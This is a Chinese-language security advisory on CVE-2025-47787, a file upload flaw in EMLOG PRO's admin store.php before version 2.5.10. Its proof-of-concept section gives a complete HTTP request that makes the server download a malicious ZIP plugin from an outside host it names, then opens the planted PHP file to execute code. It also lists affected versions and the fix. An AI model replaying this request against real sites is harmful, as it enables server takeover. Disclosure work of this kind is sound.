EMLOG PRO 2.5.10之前版本文件上传漏洞CVE-2025-47787

EMLOG PRO 是一款轻量级开源博客和CMS建站系统，具有速度快、省资源、易上手的特点，适合各种规模的站点搭建‌‌，支持多种功能。

一、基本情况

EMLOG PRO 2.5.10版本发布于2025年04月03日，该版本增加深蓝和草绿两款邮件模板，修复了获取用户IP函数兼容Cloudflare的功能。

栋科技漏洞库关注到EMLOG PRO 2.5.10之前版本中存在一个文件上传漏洞，该漏洞现已被追踪为CVE-2025-47787，漏洞CVSS评分8.9。

二、漏洞分析

CVE-2025-47787漏洞是EMLOG PRO 2.5.10之前版本存在的高危漏洞，该漏洞位于store.php组件中，EMLOG PRO 2.5.10版本上已修复。

该漏洞位于store.php组件中，由于无法正确验证远程下载的ZIP插件文件内容所致，漏洞使攻击者能在易受攻击的系统上执行任意代码。

具体而言，EMLOG PRO 2.5.10之前版本/admin/store.php组件中包含文件上传漏洞，无法对远程下载的ZIP插件文件内容进行充分验证。

由于该漏洞危害性极其严重，使得受影响网站被轻易入侵，并且可能导致服务器被攻击者完全接管，漏洞代码如下：

此处内容已隐藏，评论后刷新即可查看！

三、POC验证

1、首先将恶意脚本文件部署在远程服务器上，然后创建一个同名的文件夹并压缩成一个zip包。

2、启用http服务并等待远程插件下载请求

3、使用Burpsuite等工具发起远程下载请求：

GET /admin/store.php?action=install&type=plugin&source=1&cdn_source=http://172.20.10.6:8087/test_phpinfo.zip HTTP/1.1
Host: 10.211.55.4:82
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=oqdpbog0gu1jebnqi7c3h1svc6; EM_AUTHCOOKIE_UQ2YAjeQk9zyxkO70SX5UZGn1DAa8aHt=admin%7C0%7Ccda059d0dc84704de2377a0c2dba5306
X-Requested-With: XMLHttpRequest
Referer: http://10.211.55.4:82/admin/

4、这将产生相同的结果：

5、最后，访问如下地址：

http://10.211.55.4:82/content/plugins/test_phpinfo/test_phpinfo.php

四、影响范围

EMLOG PRO <= 2.5.9

五、修复建议

EMLOG PRO >= 2.5.10

六、参考链接

https://github.com/emlog/emlog/security/advisories/GHSA-4mcj-8gvh-p753